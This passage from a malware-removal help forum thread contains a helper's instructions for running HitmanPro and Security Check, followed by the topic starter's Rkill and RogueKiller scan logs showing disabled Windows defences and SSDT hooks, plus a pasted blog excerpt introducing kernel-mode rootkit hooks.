  • This is the mirror - dEMD6.gif
  • For 64-bit Operating System - dEMD6.gif
  • This is the mirror - dEMD6.gif

2.Launch the program by double clicking on the 5vo5F.jpg icon. (Windows Vista/7 users right click on the HitmanPro icon and select run as administrator).

Note: If the program won't run please then open the program while holding down the left CTRL key until the program is loaded.

3.Click on the next button. You must agree with the terms of EULA. (if asked)

4.Check the box beside "No, I only want to perform a one-time scan to check this computer".

5.Click on the next button.

6.The program will start to scan the computer. The scan will typically take no more than 2-3 minutes.

7.When the scan is done click on drop-down menu of the found entries (if any) and choose - Apply to all => Ignore <= IMPORTANT!!!
 
8.Click on the next button.

9.Click on the "Save Log" button.

10.Save that file to your desktop and post the content of that file in your next reply.
 
Note: if there isn't a dropdown menu when the scan is done then please don't delete anything and close HitmanPro

Navigate to C:\ProgramData\HitmanPro\Logs open the report and copy and paste it to your next reply.

 

 

 

STEP 6

 

 

Download Security Check by screen317 from here.

  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

 

and then if there aren't any issues left I'll give you my final recommendations. :)

 

 

Regards,

Georgi


cXfZ4wS.png


#11 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:09:31 PM

Posted 04 November 2014 - 08:28 AM

Wow!  No crazy running processes and 97% memory hogging!

Thank you Georgi!

I will tend to those programs today and post.

 

Would you tell me what the FRST program actually did to remove this insidious thing please?

 

Also,, as you probably saw, my co-worker's files have been ransomed.  I am going to go to the FoxIT Scanner site to see if the free key unlocks them, after I do the other scanning.  Is that something that you have used before?

 

Thank you so much again!



#12 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:09:31 PM

Posted 04 November 2014 - 09:19 AM

Rkill 2.6.8 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 11/04/2014 09:11:01 AM in x86 mode.
Windows Version: Windows 7 Professional Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * No malware processes found to kill.

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * System Restore Disabled

   [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
   "DisableSR" = dword:00000001

 * Windows Defender Disabled

   [HKLM\SOFTWARE\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001

 * Windows Firewall Disabled

   [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
   "EnableFirewall" = dword:00000000

Checking Windows Service Integrity:

 * Windows Defender (WinDefend) is not Running.
   Startup Type set to: Disabled

 * Security Center (wscsvc) is not Running.
   Startup Type set to: Disabled

 * Windows Update (wuauserv) is not Running.
   Startup Type set to: Disabled

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * HOSTS file entries found:

  127.0.0.1       localhost

Program finished at: 11/04/2014 09:12:24 AM
Execution time: 0 hours(s), 1 minute(s), and 23 seconds(s)
 



#13 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:09:31 PM

Posted 04 November 2014 - 10:26 AM

RogueKiller V10.0.4.0 [Oct 29 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 32 bits version
Started in : Normal mode
User : ScalaC [Administrator]
Mode : Scan -- Date : 11/04/2014  09:36:23

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 13 ¤¤¤
[PUM.Dns] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{424147DC-30E0-4EF1-84FF-DF9A5EF85995} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{AD67ED7A-71F7-4E27-9F5E-A494BB679476} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{424147DC-30E0-4EF1-84FF-DF9A5EF85995} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{AD67ED7A-71F7-4E27-9F5E-A494BB679476} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{424147DC-30E0-4EF1-84FF-DF9A5EF85995} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Dns] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{AD67ED7A-71F7-4E27-9F5E-A494BB679476} | DhcpNameServer : 10.33.32.34 10.33.32.190 4.2.2.2 [(Private Address) (XX)]  -> Found
[PUM.Desktop] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore | DisableSR : 1  -> Found
[PUM.StartMenu] HKEY_USERS\S-1-5-21-19809612-450918713-1538882281-38475\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.DesktopIcons] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1       localhost

¤¤¤ Antirootkit : 44 (Driver: Loaded) ¤¤¤
[SSDT:Addr(Hook.SSDT)] NtAlertResumeThread[13] : Unknown @ 0x875b5670
[SSDT:Addr(Hook.SSDT)] NtAlertThread[14] : Unknown @ 0x875bac30
[SSDT:Addr(Hook.SSDT)] NtAllocateVirtualMemory[19] : Unknown @ 0x875b32e0
[SSDT:Addr(Hook.SSDT)] NtAlpcConnectPort[22] : Unknown @ 0x86e89a68
[SSDT:Addr(Hook.SSDT)] NtAssignProcessToJobObject[43] : Unknown @ 0x875ba550
[SSDT:Addr(Hook.SSDT)] NtCreateMutant[74] : Unknown @ 0x875b5498
[SSDT:Addr(Hook.SSDT)] NtCreateSymbolicLinkObject[86] : Unknown @ 0x875ba348
[SSDT:Addr(Hook.SSDT)] NtCreateThread[87] : Unknown @ 0x875b1b80
[SSDT:Addr(Hook.SSDT)] NtCreateThreadEx[88] : Unknown @ 0x875ba3f0
[SSDT:Addr(Hook.SSDT)] NtDebugActiveProcess[96] : Unknown @ 0x875ba5e8
[SSDT:Addr(Hook.SSDT)] NtDuplicateObject[111] : Unknown @ 0x875b33a8
[SSDT:Addr(Hook.SSDT)] NtFreeVirtualMemory[131] : Unknown @ 0x875b3190
[SSDT:Addr(Hook.SSDT)] NtImpersonateAnonymousToken[145] : Unknown @ 0x875b5540
[SSDT:Addr(Hook.SSDT)] NtImpersonateThread[147] : Unknown @ 0x875b55d8
[SSDT:Addr(Hook.SSDT)] NtLoadDriver[155] : Unknown @ 0x86e9caa0
[SSDT:Addr(Hook.SSDT)] NtMapViewOfSection[168] : Unknown @ 0x875b30d8
[SSDT:Addr(Hook.SSDT)] NtOpenEvent[177] : Unknown @ 0x875b5400
[SSDT:Addr(Hook.SSDT)] NtOpenProcess[190] : Unknown @ 0x875b6008
[SSDT:Addr(Hook.SSDT)] NtOpenProcessToken[191] : Unknown @ 0x86f1cbd0
[SSDT:Addr(Hook.SSDT)] NtOpenSection[194] : Unknown @ 0x875b52d0
[SSDT:Addr(Hook.SSDT)] NtOpenThread[198] : Unknown @ 0x875b6088
[SSDT:Addr(Hook.SSDT)] NtProtectVirtualMemory[215] : Unknown @ 0x875ba4a8
[SSDT:Addr(Hook.SSDT)] NtQueueApcThread[269] : Unknown @ 0x875ba2a0
[SSDT:Addr(Hook.SSDT)] NtQueueApcThreadEx[270] : Unknown @ 0x875ba1f8
[SSDT:Addr(Hook.SSDT)] NtResumeThread[304] : Unknown @ 0x875bacc8
[SSDT:Addr(Hook.SSDT)] NtSetContextThread[316] : Unknown @ 0x875bae90
[SSDT:Addr(Hook.SSDT)] NtSetInformationProcess[333] : Unknown @ 0x875baf28
[SSDT:Addr(Hook.SSDT)] NtSetSystemInformation[350] : Unknown @ 0x875ba680
[SSDT:Addr(Hook.SSDT)] NtSuspendProcess[366] : Unknown @ 0x875b5368
[SSDT:Addr(Hook.SSDT)] NtSuspendThread[367] : Unknown @ 0x875bad60
[SSDT:Addr(Hook.SSDT)] NtTerminateProcess[370] : Unknown @ 0x85713ae8
[SSDT:Addr(Hook.SSDT)] NtTerminateThread[371] : Unknown @ 0x875badf8
[SSDT:Addr(Hook.SSDT)] NtUnmapViewOfSection[385] : Unknown @ 0x875bafd0
[SSDT:Addr(Hook.SSDT)] NtWriteVirtualMemory[399] : Unknown @ 0x875b3238
[ShwSSDT:Addr(Hook.Shadow)] NtUserAttachThreadInput[318] : Unknown @ 0x88650210
[ShwSSDT:Addr(Hook.Shadow)] NtUserGetAsyncKeyState[402] : Unknown @ 0x885dda58
[ShwSSDT:Addr(Hook.Shadow)] NtUserGetKeyboardState[434] : Unknown @ 0x8864f9b8
[ShwSSDT:Addr(Hook.Shadow)] NtUserGetKeyState[436] : Unknown @ 0x886284a0
[ShwSSDT:Addr(Hook.Shadow)] NtUserGetRawInputData[448] : Unknown @ 0x86a13330
[ShwSSDT:Addr(Hook.Shadow)] NtUserMessageCall[490] : Unknown @ 0x86a20f78
[ShwSSDT:Addr(Hook.Shadow)] NtUserPostMessage[508] : Unknown @ 0x86a131e8
[ShwSSDT:Addr(Hook.Shadow)] NtUserPostThreadMessage[509] : Unknown @ 0x86a20fc0
[ShwSSDT:Addr(Hook.Shadow)] NtUserSetWindowsHookEx[585] : Unknown @ 0x86a133f8
[ShwSSDT:Addr(Hook.Shadow)] NtUserSetWinEventHook[588] : Unknown @ 0x886683f0

¤¤¤ Web browsers : 1 ¤¤¤
[PUM.HomePage][FIREFX:Config] izvhwsf0.default : user_pref("browser.startup.homepage", "www.google.com"); -> Found

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD2500BPVT-75JJ5T0 ATA Device +++++
--- User ---
[MBR] f825c7e5cc15d846901fd8e3e869e6f5
[BSP] 36084d14aa184d0d8bb4f81a9b7bf200 : Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 238373 MB
User = LL1 ... OK
User = LL2 ... OK


============================================
RKreport_DEL_10232014_181901.log - RKreport_DEL_10232014_182443.log - RKreport_DEL_10232014_182658.log - RKreport_DEL_10232014_182725.log
RKreport_DEL_10302014_135803.log - RKreport_DEL_10312014_181301.log - RKreport_SCN_10232014_180616.log - RKreport_SCN_10302014_133840.log
RKreport_SCN_10312014_180716.log



#14 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:09:31 PM

Posted 04 November 2014 - 10:29 AM

The Adlice website came up after the scan with the following:

 

KernelMode rootkits: Part 1, SSDT hooks

 
This is the first part of this series about Kernel Mode rootkits, I wanted to write on it and demonstrate how some rootkits (Ex: Necurs) do to hide their presence and protect themselves from removal by using SSDT hooks.
 
I’ll first introduce what is KernelMode (against UserLand), then what is SSDT, and to finish demonstrate how a hook can be made, detected, and removed.
 
This post is about a classic trick, known for decades. Malware specialists may know this already, so this is mostly an introduction for whom willing to learn the theory of rootkits, and have a demonstration. Call that beginners if you want icon_smile.gif

 
 

If you land here from RogueKiller…

 
…This is because RogueKiller has detected a SSDT hook. Don’t panic. Most of the time, they are made by antiviruses to protect your computer.
 
However, most of antiviruses drivers are whitelisted in RogueKiller, so either the driver is not known (please verify by typing it on Google, -example: klif.sys = Kaspersky-) or the the module is a real malware (if you didn’t find anything on it on Google, or worst, you found bad things), or because the module has not been identified (shellcoded outsided of any module), the module is named “Unknown”. In this last case, If nothing else has been found by RogueKiller, just skip it. Some antiviruses can use shellcodes to protect their driver too.
 
Another thing to know is it’s USELESS in most of the cases to remove a hook, because if you’re able to restore it (and you don’t have a BSoD restoring it) it will be back at reboot. You have to target the persistence item instead (registry key, patched file, …). In RogueKiller, SSDT hooks are just listed for diagnose and will not be restored.

 
 



#15 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:09:31 PM

Posted 04 November 2014 - 10:55 AM

I did not do anything with them.  I am awaiting your instruction before I run the next program.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users